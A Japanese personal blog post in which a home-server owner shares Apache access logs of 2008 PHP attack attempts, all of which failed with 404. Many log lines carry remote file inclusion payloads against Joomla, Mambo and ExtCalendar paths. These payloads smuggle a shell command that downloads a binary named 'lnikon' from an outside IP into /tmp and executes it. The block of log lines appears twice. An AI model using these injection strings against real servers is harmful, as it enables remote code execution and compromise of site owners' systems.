最近、自宅サーバーのアクセスログを見ていると、 PHP の脆弱性を狙った攻撃が
かなり増えています( ´д`)
進入しようとしてるんだろうけどさぁ。
攻撃しても無駄なのに(´・ω・‘)
ってことで最近、アタックしてきたログを貼り付けておきます。
IPアドレスは偽装している可能性もあるため、伏字にしといてあげよう。
けど、アクセスして進入できるかの結果を知りたい場合、レスポンスを受け取るために、このIPアドレスで
攻撃されてることは間違いなさそうだけどね。
たぶん proxy かな?
------------------------------------------------------------
62.112.159.16x - - [11/Apr/2008:15:23:27 +0900] "POST /xmlrpc.php HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:29 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:30 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:31 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:32 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:34 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:35 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:36 +0900] "POST /xmlrpc.php HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:38 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:39 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:40 +0900] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:41 +0900] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:43 +0900] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:44 +0900] "GET /admin/business_inc/saveserver.php?thisdir=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:45 +0900] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:47 +0900] "GET /components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:48 +0900] "GET /administrator/component/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:49 +0900] "GET /component/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:50 +0900] "GET /com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:52 +0900] "GET /joomla/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 345 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:53 +0900] "GET /blog/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:54 +0900] "GET /forum/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:56 +0900] "GET /page/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:29 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:30 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:31 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:32 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:34 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:35 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:36 +0900] "POST /xmlrpc.php HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:38 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:39 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:40 +0900] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:41 +0900] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:43 +0900] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:44 +0900] "GET /admin/business_inc/saveserver.php?thisdir=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:45 +0900] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:47 +0900] "GET /components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:48 +0900] "GET /administrator/component/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:49 +0900] "GET /component/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:50 +0900] "GET /com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:52 +0900] "GET /joomla/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 345 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:53 +0900] "GET /blog/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:54 +0900] "GET /forum/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
62.112.159.16x - - [11/Apr/2008:15:23:56 +0900] "GET /page/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://85.17.18.113/cmd.gif?&cmd=cd%20/tmp;wget%2085.17.18.113/lnikon;chmod%20755%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
------------------------------------------------------------
しかし、PHP の脆弱性を狙ったアクセスログがここのところ多い。。
ほぼ毎日、色んなパターンでアクセスしてきてるんだが。
0 件のコメント:
コメントを投稿